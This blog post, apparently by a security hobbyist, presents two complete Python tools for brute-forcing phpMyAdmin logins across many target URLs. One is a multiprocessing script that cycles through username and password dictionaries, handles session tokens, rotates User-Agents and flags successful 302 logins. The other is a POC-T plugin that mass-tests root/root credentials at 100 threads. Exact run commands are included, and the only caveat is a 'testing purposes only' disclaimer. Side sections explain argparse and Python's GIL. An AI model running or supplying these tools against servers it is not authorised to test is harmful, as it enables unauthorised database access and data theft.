Python multiprocessing & multithreading brute force attack on phpMyAdmin weak passwords

Cause of the Incident#

This code is for testing purposes only. The author is not responsible for any consequences resulting from its use!

The website of the great test404 has also been shut down, and his phpMyAdmin multi-threaded batch cracking tool was last updated to v2.3.

However, it is not very useful:

image

The code found online is not very useful, so I wrote one myself.

Some Explanations#

Core Code for Verification#

I read many articles online and found that the core step is to send a request with the constructed username and password and then check the returned login page for a unique keyword.

For example, the script written by bypass checks for the login_form field:

image

There are also checks for the pma_password field:

image

Some even check for the string phpMyAdmin is more friendly with a, which cannot be found on either the correct-password or the wrong-password page:

image
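In other words, those scripts post the credentials and then look for the presence or absence of some marker string in the returned HTML. A much-simplified sketch of that pattern (the marker and form fields here are only illustrative, and as noted above, this kind of check is not reliable):

import requests


def keyword_check(url, username, password):
    # post the credentials straight to the login form
    resp = requests.post(url, data={"pma_username": username,
                                    "pma_password": password})
    # if the login-form marker is gone from the response, assume the login worked
    return "login_form" not in resp.text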

After looking around, I still feel that this article on Experience Box looks the most reliable (although it also becomes less reliable later on).

The core of the implementation is to use the requests library's session() to keep the session alive: first obtain the session id and the current token, then add the username and password and POST the whole thing, making sure the id and the token do not change between the two requests.
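Roughly, the idea looks like this (a minimal sketch with error handling omitted; the form fields and the 302 check match the full script further down):

import re
import requests


def try_login(url, username, password):
    session = requests.session()  # keeps the cookies, i.e. the phpMyAdmin session id
    resp = session.get(url)
    # the login page embeds a per-session token that must be posted back unchanged
    token = re.findall(r'name="token" value="(.*?)"', resp.text)[0]
    payload = {"pma_username": username, "pma_password": password,
               "server": "1", "target": "index.php", "token": token}
    resp2 = session.post(url, data=payload, allow_redirects=False)
    # a correct password is answered with a 302 redirect to index.php
    return resp2.status_code == 302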

Command Line Parameter Settings#

This is the first time I have added command-line parameters to one of my utility scripts, although the parameter is optional.

I added a -p option for mounting a dictionary. There are three well-known ways to handle command-line parameters in Python:

  1. sys.argv + getopt

This is just simple string splitting, with nothing clever about it:

image
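For reference, a minimal sys.argv + getopt version of a -p option could look like this (a sketch, not the screenshot above; the script name in the comment is just an example):

import getopt
import sys

# parse "-p <path>" from the command line, e.g. python crack.py -p password.txt
opts, _ = getopt.getopt(sys.argv[1:], "p:")
dic_path = None
for opt, value in opts:
    if opt == "-p":
        dic_path = value
print("dictionary:", dic_path)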

  2. argparse

Many people recommend it, and I found it quite useful.

image
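As a rough illustration (not necessarily what the screenshot shows), the -p option used later in this post can be declared like this:

import argparse

parser = argparse.ArgumentParser(description="phpMyAdmin weak password check")
parser.add_argument("-p", type=str, metavar="dic_path", help="Dictionary path")
args = parser.parse_args()  # e.g. python phpmyadmin.py -p password.txt
print(args.p)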

Recommended Articles

  3. click

Click is an excellent open-source project developed by pallets, the team behind Flask. It encapsulates a lot of the boilerplate of building command-line tools so that developers can focus purely on the functionality. It is a well-known third-party library designed specifically for command-line programs.

image

It uses decorators, which looked a bit daunting, so I didn't use it.
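Just to show the decorator style that put me off, here is what the same -p option might look like with click (a sketch; click is a third-party package installed separately with pip install click):

import click


@click.command()
@click.option("-p", "dic_path", default=None, help="Dictionary path")
def main(dic_path):
    click.echo("dictionary: {}".format(dic_path))


if __name__ == "__main__":
    main()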

About Multi-Threading / Multi-Processing#

Liao Xuefeng's explanation of why multi-threading cannot effectively use multiple CPU cores:

Python threads are real threads, but when the interpreter executes code there is a GIL lock: the Global Interpreter Lock. Any Python thread must first acquire the GIL before executing, and after every 100 bytecode instructions the interpreter automatically releases the GIL to give other threads a chance to run. This global lock effectively serializes the execution of all threads' code, so multi-threading in Python can only execute alternately: even if 100 threads run on a 100-core CPU, only one core is actually used.

GIL is a historical legacy issue in the design of the Python interpreter. The interpreter we usually use is the official implementation, CPython. To truly utilize multiple cores, one would have to rewrite an interpreter without GIL.

Therefore, in Python, multi-threading can be used, but do not expect to effectively utilize multiple cores. If you must utilize multiple cores through multi-threading, it can only be achieved through C extensions, but this would lose the simplicity and ease of use that Python offers.

However, there is no need to worry too much. Although Python cannot utilize multi-threading to implement multi-core tasks, it can achieve multi-core tasks through multi-processing. Multiple Python processes have their own independent GIL locks and do not interfere with each other.

In simple terms, if Python wants to utilize multiple cores, it can only use multi-processing.

In this article comparing multi-threading and multi-processing, Efficiency Comparison Experiment of Single Thread, Multi-Thread, and Multi-Process in Python, the following conclusions can be drawn:

  • Multi-threading performs significantly worse than single-threaded linear execution for CPU-intensive work, but for network requests, where threads spend most of their time blocked, the advantage of multi-threading becomes very clear.
  • Multi-processing shows a performance advantage for CPU-intensive, IO-intensive, and network-request-intensive work (operations that frequently block threads). For network-request-heavy work, however, it is not much faster than multi-threading while consuming noticeably more CPU and other resources, so in that case multi-threading is the better choice.
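If you want to get a feel for this yourself, a rough, self-contained comparison might look like the following (timings are machine-dependent and this is not the experiment from the linked article):

import time
from multiprocessing.pool import Pool, ThreadPool


def cpu_task(n):
    # CPU-bound pure-Python loop; in threads it is throttled by the GIL
    total = 0
    for i in range(n):
        total += i * i
    return total


if __name__ == "__main__":
    jobs = [2000000] * 8
    for name, pool_cls in (("threads", ThreadPool), ("processes", Pool)):
        start = time.time()
        with pool_cls(4) as pool:
            pool.map(cpu_task, jobs)
        print("{}: {:.2f}s".format(name, time.time() - start))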

In my implementation process, it can be summarized in one sentence:

Multi-threading and multi-processing are similarly efficient here, but multi-processing's CPU consumption is far more noticeable.

Complete Code for Multi-Processing#

Here is the multi-processing version of my Python phpMyAdmin cracking script. The complete code is as follows:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
@author: soapffz
@function: Multi-Process Cracking of phpMyAdmin Passwords (Supports Dictionary Mounting)
@time: 2019-12-28
'''

import requests
import os
from multiprocessing.pool import Pool
import time
import sys
import argparse
from fake_useragent import UserAgent
import re
import timeit


class multi_phpmyadmin_verification:
    def __init__(self):
        args = self.argparse(sys.argv[1:])
        # switch to the script's directory so the default txt files are found
        os.chdir(os.path.dirname(os.path.abspath(__file__)))
        if not args.p:
            self.passwd_l = open("password.txt").read().splitlines()
        elif not os.path.exists(args.p) or not os.path.isfile(args.p):
            print("path does not exist, quit")
            exit(0)
        else:
            # read the mounted dictionary, one password per line
            self.passwd_l = open(args.p).read().splitlines()
        self.urls_l = open("url.txt").read().splitlines()
        self.username_l = open("username.txt").read().splitlines()
        self.multi_thread()

    def argparse(self, argv):
        # Parsing parameters
        parser = argparse.ArgumentParser()  # Create a parse object
        parser.add_argument(
            "-p", type=str, metavar="dic_path", help="Dictionary path")
        return parser.parse_args(argv)

    def multi_thread(self):
        # despite the method name, this builds a process pool (multiprocessing.pool.Pool)
        ua = UserAgent()  # Used to generate User-Agent
        self.headers = {"User-Agent": ua.random}  # Get a random User-Agent
        pool = Pool()  # defaults to the number of CPU cores
        for url in self.urls_l:
            for username in self.username_l:
                for passwd in self.passwd_l:
                    pool.apply_async(self.verify, args=(
                        url, username, passwd,))
        pool.close()
        pool.join()

    def verify(self, url, username, passwd):
        time.sleep(0.01)
        print("\r Current url:{},Current username:{},Current password:{}".format(
            url, username, passwd), end="")
        # Use the \ r parameter to refresh the current line output
        session = requests.session()
        r1 = session.get(url)
        if r1.status_code != 200:
            return
        # grab the phpMyAdmin session id from the Set-Cookie header
        session_id = re.findall(r'phpMyAdmin=(.*?);', r1.headers['Set-Cookie'])
        # extract the per-session CSRF token embedded in the login form
        token = list(re.compile(
            r'name=\"token\" value=\"(.*?)\"').findall(r1.text))[0]
        payload = {"set_session": session_id, "pma_username": username,
                   "pma_password": passwd, "server": "1", "target": "index.php", "token": token}
        r2 = session.post(url, data=payload,
                          allow_redirects=False, headers=self.headers)
        # a successful login is answered with a 302 redirect
        if r2.status_code == 302:
            print("\n Succeeded!!!url:{},username:{},password:{}".format(
                url, username, passwd))


if __name__ == "__main__":
    start_time = timeit.default_timer()
    multi_phpmyadmin_verification()
    end_time = timeit.default_timer()
    print("\n Program execution finished, total time:{}".format(end_time-start_time))

Usage:

  • Create url.txt, username.txt, and password.txt in the same directory as the script, and fill in the URLs, usernames, and passwords to be tested, one per line.
  • Install the third-party libraries with pip install: requests and fake_useragent (multiprocessing, argparse, and timeit are part of the standard library and need no installation).
  • Run the script with python phpmyadmin.py; you can optionally add -p followed by the path to a dictionary file, as shown below.
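For example (the dictionary path is just an illustration):

pip install requests fake_useragent
python phpmyadmin.py
python phpmyadmin.py -p /path/to/dict.txt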

The running effect is as follows:

image

CPU usage is noticeable:

image

The process pool size is set automatically based on your CPU core count. If you find the usage too high, you can pass the number of processes you want in the parentheses of pool = Pool(); setting it slightly below your core count will keep the CPU from being completely saturated.
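For example, to leave one core free (a sketch; adjust the number to taste):

import os
from multiprocessing.pool import Pool

# use one process fewer than the number of CPU cores
pool = Pool(processes=max(1, os.cpu_count() - 1))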

Multi-Threaded Version#

[Updated on 2020-02-12]

You can use the POC-T framework to manage the multi-threading. For details, see its GitHub page.

Save the following code as phpmyadmin-weakpass.py in the script folder of POC-T:

# -*- coding: utf-8 -*-
import requests
import re


def poc(url_dict):
    # POC-T calls poc() once per target url; return the url on success
    try:
        session = requests.session()
        req = session.get(url_dict)
        if req.status_code == 200:
            # grab the phpMyAdmin session id from the Set-Cookie header
            session_id = re.findall(
                r'phpMyAdmin=(.*?);', req.headers['Set-Cookie'])
            token = list(re.compile(
                r'name=\"token\" value=\"(.*?)\"').findall(req.text))[0]
            headers = {"Upgrade-Insecure-Requests": "1",
                       "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 Edg/80.0.361.50", "Connection": "close"}
            paramsPost = {"set_session": session_id, "pma_username": "root",
                          "pma_password": "root", "server": "1", "target": "index.php", "token": token}
            r2 = session.post(url_dict, data=paramsPost,
                              allow_redirects=False, headers=headers)
            # a successful root/root login is answered with a 302 redirect
            if r2.status_code == 302:
                return url_dict
    except:
        return False

Usage as follows:

python POC-T.py -s phpmyadmin-weakpass -t 100 -iF urls.txt -o first.txt

The effect is as follows:

image
